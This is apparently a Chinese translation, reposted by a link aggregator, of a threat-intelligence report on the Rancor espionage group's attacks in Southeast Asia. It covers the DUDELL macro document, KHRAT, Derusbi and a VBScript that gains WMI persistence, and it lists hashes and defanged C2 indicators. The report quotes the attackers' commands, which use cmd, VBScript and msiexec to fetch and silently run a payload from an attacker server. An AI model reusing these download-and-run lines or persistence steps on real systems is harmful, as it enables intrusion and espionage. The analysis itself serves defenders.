25

Rancor组织东南亚攻击活动分析

 4 years ago
source link: https://www.freebuf.com/articles/network/223258.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

在2018年6月下旬,研究人员发现了一个未知的网络间谍组织Rancor,该组织在2017年和2018年期间在东南亚进行了有针对性的攻击。在研究这些攻击时发现了一个未记录的自定义恶意软件家族Dudell。

攻击细节

在2018年12月上旬至2019年1月下旬之间,Rancor进行了至少两轮攻击,在受害者系统上安装Derusbi或KHRat恶意软件。 2019年1月通过149.28.156 [.] 61发送,以cswksfwq.kfesv [.]xyz或connect.bafunpda [.] xyz作为C2。

样本分析

DUDELL

BbyEZnA.jpg!web

DUDELL是经过处理的Microsoft Excel文档,其中包含恶意宏。 SHA-1 c829f5f9f89210c888c1559bb085ec6e65232de。 以下为其元数据信息:

yuQz2ab.jpg!web

当用户查看文档并单击“启用内容”时,将执行该文档中的宏,这时该宏将定位并执行位于文档属性中“公司”字段下的数据。 位于公司字段下的数据是:

cmd /c set /p=Set v=CreateObject(^”Wscript.Shell^”):v.Run ^”msiexec /q /i http://199.247.6[.]253/ud^”,false,0 <nul > C:\Windows\System32\spool\drivers\color\tmp.vbs

C2服务器199.247.6 [。] 253由Rancor组使用。 该脚本通过Microsoft工具msiexec下载第二阶段的有效负载。 在目录c:\ Windows \ System32 \ spool \ drivers \ color中发现了文件office.vbs(SHA256:4b0b319***c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2)。 该文件的内容是:

Set v=CreateObject(“Wscript.Shell”):v.Run “msiexec /q /i http://199.247.6[.]253/OFFICE”,false,0
SHA256 b958e481c90939962081b9fb85451a2fb28f705d5***60f5d9d5aebfb390f832

如果tmp.vbs文件包含与office.vbs文件相似的内容,可能是下载有效载荷另一种方法。

DDKONG Plugin

恶意软件配置有以下导出条目:

ii2UF3U.jpg!web

DllInstall

DllInstall检查带有标题“ Hello Google”的隐藏窗口 和Google的类名,请参见下面的图1。 执行此检查以确保一次仅运行一个恶意软件实例。

IVbIbqf.jpg!web

恶意软件创建的隐藏窗口会在用户输入(例如键盘或鼠标活动)上进行过滤。 为了避沙盒分析通常不执行鼠标和键盘。 然后,恶意软件将信标发送到TCP端口8080上已配置的cswksfwq.kfesv [.] xyz远程服务器。成功连接后,恶意软件将传输受害者信息,例如:主机名,IP地址,语言包以及其他操作系统信息。 传输的数据经过XOR编码。 该恶意软件支持以下功能:

终止特定进程

枚举进程

上传文件

下载文件

删除文件

列出文件夹内容

枚举存储卷

执行命令

反向shell

截图

KHRAT

eiu2UnQ.jpg!web

Rmcmd

最初加载DLL时,它会动态解析并导入所需的其他模块(DLL)。 加载并调用Rmcmd后,它将创建一个名为gkdflbmdfk的Windows互斥锁。 这样可以确保一次仅运行一个恶意软件。 然后它开始向TCP端口8081上connect.bafunpda [.] xyz的域发出信号。恶意软件从主机收集并传输数据,例如主机名,并以网络流量的第一个字节为密钥进行XOR编码,该恶意软件可反向shell。

恶意软件的行为和代码与2018年5月的KHRAT样本有相似之处。示例(SHA256:bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659)具有相同的导出条目名称,也是一个反向shell。新的样本是出于优化目的而重新编写的,底层行为保持不变。

Derusbi

qeu6bua.jpg!web

Derusbi是后门木马,检测到的样本是一个加载程序,可为其功能加载加密的有效负载。 此DLL加载的可执行文件需要在命令行上包含32字节的密钥,以解密嵌入的有效负载,加载流程如下:

1、如果加载样本的模块名为myapp.exe,则该模块将退出
2、加载后,它会休眠六秒钟
3、查找名为\\.\ pipe \ _kernel32.dll.ntdll.dll.use***.dll的Windows通道
4、查找名为\ Device \ acpi_010221的Windows设备
5、创建以下注册表项
HKEY_CLASSES_ROOT \ CDO.SS_NNTPOnPostEarlySink.2名为IDX和Ver的DWORD值。
6、保存加密的数据
7、解密嵌入式有效负载

Rancor VBScript

在2019年7月发现VBScript,名为Chrome.vbs(SHA256:0C3D4DFA566F3064A8A408D3E1097**54662860BCACFB6675D2B72739CE449C2)。 VBScript有效载荷指向域bafunpda [.]xyz,KHRAT Trojan也使用此域。该VBScript被混淆,并包含打包数据,下面为VBScript的执行流程:

Ene6Zba.jpg!web

1、将regsv***.exe从%windir%\ syswow64复制到%windir%\ spoolsw.exe。
2、在主机的%TMP%文件夹中创建一个名为vdfjgklffsdfmv.txt的文本文件。 该文件不是文本文件,而是Windows管理对象文件MOF。
3、执行Windows mofcomp.exe,并传入在步骤2中创建的MOF文件。
4、将数据添加到两个注册表项:classes和media。 数据保存在默认键中。
5、从步骤4中创建的注册表项类中读取数据的Blob,并将数据保存到文件%windir%\ pla.dat。

VBScript创建的MOF文件通过Windows Management Instrumentation达到稳定控制的目的。MOF文件创建一个计时器事件,该事件每五秒钟触发一次。 MOF文件的片段如下图所示:

VVnmqmU.jpg!web

上图显示了MOF文件的主要功能。 它具有唯一的事件日志过滤器,并且每5秒运行spoolsw.exe,并将/ s / n / i参数传入文件pla.dat,参数指示regsv***不要显示任何消息框(/ s),不要调用DllRegisterServer或DllUnregisterServer(/ n),不要调用DllInstall(/ i)。

VBScript创建的注册表值如下:

HKEY_CURRENT_USER \ Software \ Classes

HKEY_CURRENT_USER \ Software \ Classes中注册表数据的文件属性

z6NVzqb.jpg!web

嵌入在此注册表项中的DLL是一个简单的加载程序,可从注册表HKEY_LOCAL_MACHINE \ SOFTWARE \ Clients \ Media中加载代码

HKEY_LOCAL_MACHINE \ SOFTWARE \ Clients \ Media包含DLL的shellcode和x86代码,数据使用 与key值0x9C异或进行编码。

uUFBR3u.jpg!web

位于Media注册表项中的DLL是KHRAT木马的一种变体。 它向域connect.bafunpda [.] xyz发出信号,并尝试连接到TCP端口4433。与KHRAT木马使用的相同域,并具有相同的行为。

总结

Rancor从2017年开始活跃且一直在东南亚进行有针对性的攻击,它使用的是自定义恶意软件家族Dudell,一旦执行恶意宏就会下载第二阶段有效负载并执行。Rancor还使用Derusbi恶意软件在渗透目标后进行辅助加载外部程序。

IoCs

SHA256:

0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707
AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609
0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E
DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E
CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A
BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659
83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d

C2s

cswksfwq.kfesv[.]xyz
Connect.bafunpda[.]xyz
199.247.6[.]253

*参考来源: unit42 ,由Kriston编译,转载请注明来自FreeBuf.COM


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK